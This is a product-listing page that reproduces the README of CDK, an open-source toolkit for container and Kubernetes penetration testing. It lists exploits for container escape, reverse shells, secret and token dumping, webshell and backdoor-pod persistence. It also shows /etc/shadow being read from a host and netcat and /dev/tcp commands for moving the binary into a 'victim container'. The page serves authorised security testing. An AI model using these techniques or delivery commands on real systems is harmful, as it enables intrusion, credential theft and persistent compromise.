长亭百川云 - 产品详情

长亭百川云

技术讨论长亭漏洞情报库IP 威胁情报SLA在线工具
热门产品
雷池 WAF 社区版
IP 威胁情报
网站安全监测
百川漏扫服务
云堡垒机
百川云
技术文档
开发工具
长亭漏洞情报库
网安百科
安全社区
CT STACK 安全社区
雷池社区版
XRAY 扫描工具
长亭科技
长亭科技官网
万众合作伙伴商城
长亭 BBS 论坛
友情链接
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备2024055124号-2
banner
产品logo

CDK

418

0

使 K8s、Docker 和 Containerd 的安全测试更容易。

产品logo
CDK

使 K8s、Docker 和 Containerd 的安全测试更容易。

CDK - Zero Dependency Container Penetration Toolkit

English | 简体中文

png

Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal.
CDK is for security testing purposes only.

Overview

CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

Quick Start

Run cdk eva to get evaluate info and a recommend exploit, then run cdk run to start the attack.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installation/Delivery

Download latest release in https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Deliver CDK into target container in real-world penetration testing

If you have an exploit that can upload a file, then you can upload CDK binary directly.

If you have a RCE exploit, but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host CDK binary on your host with public IP.
(on your host)
nc -lvp 999 < cdk
  1. Inside the victim container execute
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
  cdk auto-escape <cmd>                     Escape container in different ways then let target execute <cmd>.

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.

Features

CDK has three modules:

  1. Evaluate: gather information inside container to find potential weakness.
  2. Exploit: for container escaping, persistance and lateral movement
  3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command will run the scripts below without local file scanning, using --full to enable all.

TacticsScriptSupportedUsage/Example
Information GatheringOS Basic Info✔link
Information GatheringAvailable Capabilities✔link
Information GatheringAvailable Linux Commands✔link
Information GatheringMounts✔link
Information GatheringNet Namespace✔link
Information GatheringSensitive ENV✔link
Information GatheringSensitive Process✔link
Information GatheringSensitive Local Files✔link
Information GatheringKube-proxy Route Localnet(CVE-2020-8558)✔link
Information GatheringDNS-Based Service Discovery✔link
DiscoveryK8s Api-server Info✔link
DiscoveryK8s Service-account Info✔link
DiscoveryCloud Provider Metadata API✔link

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]
TacticTechniqueCDK Exploit NameSupportedIn ThinDoc
Escapingdocker-runc CVE-2019-5736runc-pwn✔✔
Escapingcontainerd-shim CVE-2020-15257shim-pwn✔link
Escapingdocker.sock PoC (DIND attack)docker-sock-check✔✔link
Escapingdocker.sock RCEdocker-sock-pwn✔✔link
EscapingDocker API(2375) RCEdocker-api-pwn✔✔link
EscapingDevice Mount Escapingmount-disk✔✔link
EscapingLXCFS Escapinglxcfs-rw✔✔link
EscapingCgroups Escapingmount-cgroup✔✔link
EscapingAbuse Unprivileged User Namespace Escaping CVE-2022-0492abuse-unpriv-userns✔✔link
EscapingProcfs Escapingmount-procfs✔✔link
EscapingPtrace Escaping PoCcheck-ptrace✔✔link
EscapingRewrite Cgroup(devices.allow)rewrite-cgroup-devices✔✔link
EscapingRead arbitrary file from host system (CAP_DAC_READ_SEARCH)cap-dac-read-search✔✔link
DiscoveryK8s Component Probeservice-probe✔✔link
DiscoveryDump Istio Sidecar Metaistio-check✔✔link
DiscoveryDump K8s Pod Security Policiesk8s-psp-dump✔link
Remote ControlReverse Shellreverse-shell✔✔link
Remote ControlKubelet Execkubelet-exec✔✔
Credential AccessRegistry BruteForceregistry-brute✔✔link
Credential AccessAccess Key Scanningak-leakage✔✔link
Credential AccessEtcd Get K8s Tokenetcd-get-k8s-token✔✔
Credential AccessDump K8s Secretsk8s-secret-dump✔✔link
Credential AccessDump K8s Configk8s-configmap-dump✔✔link
Privilege EscalationK8s RBAC Bypassk8s-get-sa-token✔✔link
PersistenceDeploy WebShellwebshell-deploy✔✔link
PersistenceDeploy Backdoor Podk8s-backdoor-daemonset✔✔link
PersistenceDeploy Shadow K8s api-serverk8s-shadow-apiserver✔link
PersistenceK8s MITM Attack (CVE-2020-8554)k8s-mitm-clusterip✔✔link
PersistenceDeploy K8s CronJobk8s-cronjob✔✔link

Note about Thin: The thin release is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.

Tool Module

Running commands like in Linux, little different in input-args, see the usage link.

cdk nc [options]
cdk ps
CommandDescriptionSupportedUsage/Example
ncTCP Tunnel✔link
psProcess Information✔link
netstatLike "netstat -antup" command✔
ifconfigNetwork Information✔link
viEdit Files✔link
ectlUnauthorized enumeration of ectd keys✔
kcurlRequest to K8s api-server✔link
dcurlRequest to Docker HTTP API✔link
ucurlRequest to Docker Unix Socket✔link
rcurlRequest to Docker Registry API
probeIP/Port Scanning✔link

Release Document

If you want to know how we released a new version, how thin is produced, why we provide upx versions, what the differences between different versions about all, normal, thin, upx are, and how to choose specific CDK exploits and tools to compile an own release for yourself, please check the Release Document.

Developer Docs

  • run test in container.

Contributing to CDK

First off, thanks for taking the time to contribute!

Thanks for the following contributors:

markdown-img

More contributors:Contributors List

Bug Reporting

Bugs are tracked as GitHub Issues. Create an issue with the current CDK version, error msg and the environment. Describe the exact steps which reproduce the problem.

Suggesting Enhancements

Enhancement suggestions are tracked as GitHub Discussions. You can publish any thoughts here to discuss with developers directly.

Pull Requests

Fix problems or maintain CDK's quality:

  • Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
  • Running screenshots or logs before and after you fix the problem.

New feature or exploits:

  • Explain why this enhancement would be useful to other users.
  • Please enable a sustainable environment for us to review contributions.
  • Screenshots about how this new feature works.
  • If you are committing a new evaluate/exploit scripts, please add a simple doc to your PR message, here is an example.

Events

404StarLink 2.0 - Galaxy

png

Project CDK is now included in 404Team Starlink Project 2.0. Join the StarLink community to get in touch with CDK dev-team.

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • Briefing: "Attack Cloud Native Kubernetes"

WHC 2021 (补天白帽大会)

  • CDK: Also a Awesome BugBounty Tool for Cloud Platform

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes community Days 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
    /asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422
    HITB SecConf 2021 Amsterdam
    Briefing: "Attack Cloud Native Kubernetes"
产品logo
雷池 WAF 社区版

长亭科技

6.7k

8

一款足够简单、足够好用、足够强的免费 WAF。基于业界领先的语义引擎检测技术,作为反向代理接入,保护你的网站不受黑客攻击。

#免费#WAF#Bot防护#反爬虫#DDoS防护#开源
产品关联图片
预览
产品关联图片
预览
产品关联图片
预览
产品关联图片
预览
产品logo
BunkerWeb

3.1k

0

基于 Nginx 的开源 WAF,让 Web 服务自带安全能力

#开源#WAF
产品关联图片
预览
产品关联图片
预览
产品关联图片
预览
产品logo
xapp

长亭科技

3.2k

0

专注于web指纹识别的工具

#指纹识别#免费#开源#渗透测试#漏洞扫描
产品logo
百川 WebShell 检测

长亭科技

2.9k

1

百川 WebShell 检测工具是长亭科技提供的在线 webshell 检测检测工具, 应用与长亭主机安全,容器安全,流量监测等产品. 一键提交检测

#webshell#web安全#SaaS#主机安全#容器安全#入侵检测#应用安全
产品关联图片
预览
立即体验
K8SDocker容器安全开源
相关资讯更多